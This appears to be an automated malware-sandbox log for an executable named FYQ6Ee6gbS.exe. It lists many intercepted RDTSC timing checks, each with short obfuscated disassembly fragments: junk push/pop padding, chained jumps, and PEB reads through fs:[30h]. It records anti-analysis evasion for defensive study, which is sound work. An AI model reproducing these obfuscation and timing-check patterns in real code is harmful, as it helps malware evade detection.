    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C09AE0 second address: C09AE6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C09AE6 second address: C09B3A instructions: 0x00000000 rdtsc 0x00000002 je 00007FB418AEFE4Ch 0x00000008 jns 00007FB418AEFE46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jbe 00007FB418AEFE46h 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b popad 0x0000001c pop edx 0x0000001d mov eax, dword ptr [esp+04h] 0x00000021 jmp 00007FB418AEFE4Fh 0x00000026 mov eax, dword ptr [eax] 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b jmp 00007FB418AEFE58h 0x00000030 jp 00007FB418AEFE46h 0x00000036 popad 0x00000037 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C09B3A second address: C09B65 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FB418E0AE83h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jbe 00007FB418E0AE88h 0x00000015 push eax 0x00000016 push edx 0x00000017 jnc 00007FB418E0AE76h 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C09B65 second address: C09B69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C0B3C1 second address: C0B3E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d jmp 00007FB418E0AE86h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C0B3E7 second address: C0B40D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB418AEFE4Fh 0x00000009 jmp 00007FB418AEFE53h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C0B40D second address: C0B423 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB418E0AE76h 0x00000008 js 00007FB418E0AE76h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C0B423 second address: C0B427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C0D58C second address: C0D599 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB418E0AE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C0D599 second address: C0D5A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F0002C second address: 6F0007C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FB418E0AE7Eh 0x0000000f push eax 0x00000010 jmp 00007FB418E0AE7Bh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FB418E0AE85h 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F0007C second address: 6F000D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB418AEFE57h 0x00000009 add eax, 626FEBBEh 0x0000000f jmp 00007FB418AEFE59h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov ebp, esp 0x0000001a jmp 00007FB418AEFE4Dh 0x0000001f mov eax, dword ptr fs:[00000030h] 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 movzx esi, bx 0x0000002b rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F001C7 second address: 6F001CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F001CD second address: 6F0024B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FB418AEFE52h 0x00000014 or ch, FFFFFFE8h 0x00000017 jmp 00007FB418AEFE4Bh 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007FB418AEFE58h 0x00000023 sbb si, 7148h 0x00000028 jmp 00007FB418AEFE4Bh 0x0000002d popfd 0x0000002e popad 0x0000002f mov si, 40BFh 0x00000033 popad 0x00000034 mov esi, dword ptr [756006ECh] 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F0024B second address: 6F0024F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F0024F second address: 6F00266 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00266 second address: 6F002A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FB418E0AE7Bh 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c test esi, esi 0x0000000e jmp 00007FB418E0AE7Fh 0x00000013 jne 00007FB418E0BCFEh 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FB418E0AE85h 0x00000020 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F002A6 second address: 6F002F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB418AEFE57h 0x00000009 sbb ax, 0BAEh 0x0000000e jmp 00007FB418AEFE59h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, edi 0x0000001a pushad 0x0000001b movzx ecx, dx 0x0000001e movsx edi, ax 0x00000021 popad 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F002F4 second address: 6F002F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F002F9 second address: 6F00364 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007FB418AEFE50h 0x0000000f call dword ptr [755D0B60h] 0x00000015 mov eax, 7696E5E0h 0x0000001a ret 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FB418AEFE4Eh 0x00000022 add eax, 636E31E8h 0x00000028 jmp 00007FB418AEFE4Bh 0x0000002d popfd 0x0000002e mov si, F5DFh 0x00000032 popad 0x00000033 push 00000044h 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FB418AEFE51h 0x0000003c rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00364 second address: 6F00391 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FB418E0AE83h 0x00000012 popad 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00391 second address: 6F003E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FB418AEFE4Eh 0x00000011 xor si, B438h 0x00000016 jmp 00007FB418AEFE4Bh 0x0000001b popfd 0x0000001c mov dl, cl 0x0000001e popad 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FB418AEFE51h 0x00000027 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F003E2 second address: 6F003F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 4C4CB6AEh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F003F4 second address: 6F003F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F003F8 second address: 6F00406 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00406 second address: 6F0042A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e movsx ebx, cx 0x00000011 jmp 00007FB418AEFE4Ch 0x00000016 popad 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F0042A second address: 6F00430 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00430 second address: 6F00472 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000030h] 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FB418AEFE4Fh 0x00000015 and si, 621Eh 0x0000001a jmp 00007FB418AEFE59h 0x0000001f popfd 0x00000020 push eax 0x00000021 push edx 0x00000022 mov dh, cl 0x00000024 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00472 second address: 6F00476 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00476 second address: 6F00494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push dword ptr [eax+18h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB418AEFE52h 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F004CD second address: 6F004D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ah, dh 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F004D4 second address: 6F004E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB418AEFE4Eh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F004E6 second address: 6F004FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F004FE second address: 6F00514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB418AEFE51h 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00514 second address: 6F0051A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F0051A second address: 6F0051E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F0051E second address: 6F0052E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F0052E second address: 6F00534 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00534 second address: 6F0057B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE83h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FB487489FD3h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 call 00007FB418E0AE7Bh 0x00000017 pop esi 0x00000018 call 00007FB418E0AE89h 0x0000001d pop ecx 0x0000001e popad 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F0057B second address: 6F005C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, di 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, 00000000h 0x0000000e pushad 0x0000000f mov cl, 58h 0x00000011 mov bx, CD1Eh 0x00000015 popad 0x00000016 mov dword ptr [esi], edi 0x00000018 jmp 00007FB418AEFE55h 0x0000001d mov dword ptr [esi+04h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FB418AEFE58h 0x00000029 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F005C7 second address: 6F005CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F005CB second address: 6F005D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F005D1 second address: 6F005D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F005D7 second address: 6F0064F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+08h], eax 0x0000000b pushad 0x0000000c mov ebx, eax 0x0000000e pushfd 0x0000000f jmp 00007FB418AEFE4Eh 0x00000014 sub cx, ACA8h 0x00000019 jmp 00007FB418AEFE4Bh 0x0000001e popfd 0x0000001f popad 0x00000020 mov dword ptr [esi+0Ch], eax 0x00000023 jmp 00007FB418AEFE56h 0x00000028 mov eax, dword ptr [ebx+4Ch] 0x0000002b pushad 0x0000002c pushad 0x0000002d push edi 0x0000002e pop esi 0x0000002f call 00007FB418AEFE4Fh 0x00000034 pop esi 0x00000035 popad 0x00000036 popad 0x00000037 mov dword ptr [esi+10h], eax 0x0000003a pushad 0x0000003b movsx edi, ax 0x0000003e mov esi, 69AB6CBDh 0x00000043 popad 0x00000044 mov eax, dword ptr [ebx+50h] 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a mov cx, di 0x0000004d popad 0x0000004e rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F0064F second address: 6F00672 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE7Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+14h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB418E0AE7Dh 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00672 second address: 6F006C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FB418AEFE57h 0x00000008 pop esi 0x00000009 jmp 00007FB418AEFE59h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [ebx+54h] 0x00000014 jmp 00007FB418AEFE4Eh 0x00000019 mov dword ptr [esi+18h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push edx 0x00000020 pop eax 0x00000021 popad 0x00000022 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F006C3 second address: 6F006C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F006C9 second address: 6F006CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F006CD second address: 6F0078B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+58h] 0x0000000b pushad 0x0000000c mov dx, FB2Ch 0x00000010 popad 0x00000011 mov dword ptr [esi+1Ch], eax 0x00000014 jmp 00007FB418E0AE87h 0x00000019 mov eax, dword ptr [ebx+5Ch] 0x0000001c pushad 0x0000001d call 00007FB418E0AE84h 0x00000022 pop ebx 0x00000023 call 00007FB418E0AE7Eh 0x00000028 pushfd 0x00000029 jmp 00007FB418E0AE82h 0x0000002e and cx, F208h 0x00000033 jmp 00007FB418E0AE7Bh 0x00000038 popfd 0x00000039 pop ecx 0x0000003a popad 0x0000003b mov dword ptr [esi+20h], eax 0x0000003e jmp 00007FB418E0AE7Fh 0x00000043 mov eax, dword ptr [ebx+60h] 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 pushfd 0x0000004a jmp 00007FB418E0AE7Bh 0x0000004f sbb si, 92FEh 0x00000054 jmp 00007FB418E0AE89h 0x00000059 popfd 0x0000005a mov dh, ah 0x0000005c popad 0x0000005d rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F0078B second address: 6F007B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE4Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+24h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB418AEFE57h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F007B5 second address: 6F007CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB418E0AE84h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F007CD second address: 6F007D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F007D1 second address: 6F007F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+64h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB418E0AE89h 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F007F9 second address: 6F007FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F007FF second address: 6F00818 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE7Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+28h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00818 second address: 6F0081C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F0081C second address: 6F00822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00822 second address: 6F00827 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00827 second address: 6F00886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FB418E0AE80h 0x0000000a jmp 00007FB418E0AE85h 0x0000000f popfd 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov eax, dword ptr [ebx+68h] 0x00000016 jmp 00007FB418E0AE7Eh 0x0000001b mov dword ptr [esi+2Ch], eax 0x0000001e jmp 00007FB418E0AE80h 0x00000023 mov ax, word ptr [ebx+6Ch] 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a movsx edx, cx 0x0000002d mov cl, D7h 0x0000002f popad 0x00000030 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00886 second address: 6F0088C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F0088C second address: 6F00890 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00890 second address: 6F00955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [esi+30h], ax 0x0000000c jmp 00007FB418AEFE56h 0x00000011 mov ax, word ptr [ebx+00000088h] 0x00000018 jmp 00007FB418AEFE50h 0x0000001d mov word ptr [esi+32h], ax 0x00000021 jmp 00007FB418AEFE50h 0x00000026 mov eax, dword ptr [ebx+0000008Ch] 0x0000002c pushad 0x0000002d mov dl, 1Bh 0x0000002f popad 0x00000030 mov dword ptr [esi+34h], eax 0x00000033 jmp 00007FB418AEFE54h 0x00000038 mov eax, dword ptr [ebx+18h] 0x0000003b pushad 0x0000003c mov dx, cx 0x0000003f call 00007FB418AEFE4Ah 0x00000044 jmp 00007FB418AEFE52h 0x00000049 pop esi 0x0000004a popad 0x0000004b mov dword ptr [esi+38h], eax 0x0000004e jmp 00007FB418AEFE51h 0x00000053 mov eax, dword ptr [ebx+1Ch] 0x00000056 pushad 0x00000057 mov dx, cx 0x0000005a movzx esi, di 0x0000005d popad 0x0000005e mov dword ptr [esi+3Ch], eax 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007FB418AEFE4Eh 0x00000068 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00955 second address: 6F00967 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB418E0AE7Eh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00967 second address: 6F0096B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F0096B second address: 6F00A60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+20h] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FB418E0AE7Dh 0x00000012 adc ax, 9866h 0x00000017 jmp 00007FB418E0AE81h 0x0000001c popfd 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FB418E0AE7Eh 0x00000024 add cl, 00000008h 0x00000027 jmp 00007FB418E0AE7Bh 0x0000002c popfd 0x0000002d pushfd 0x0000002e jmp 00007FB418E0AE88h 0x00000033 sub si, BA68h 0x00000038 jmp 00007FB418E0AE7Bh 0x0000003d popfd 0x0000003e popad 0x0000003f popad 0x00000040 mov dword ptr [esi+40h], eax 0x00000043 pushad 0x00000044 mov esi, 11760B7Bh 0x00000049 pushfd 0x0000004a jmp 00007FB418E0AE80h 0x0000004f sub cx, 8CC8h 0x00000054 jmp 00007FB418E0AE7Bh 0x00000059 popfd 0x0000005a popad 0x0000005b lea eax, dword ptr [ebx+00000080h] 0x00000061 jmp 00007FB418E0AE86h 0x00000066 push 00000001h 0x00000068 pushad 0x00000069 call 00007FB418E0AE7Ah 0x0000006e jmp 00007FB418E0AE82h 0x00000073 pop esi 0x00000074 popad 0x00000075 push esp 0x00000076 pushad 0x00000077 call 00007FB418E0AE7Ch 0x0000007c push eax 0x0000007d push edx 0x0000007e rdtsc
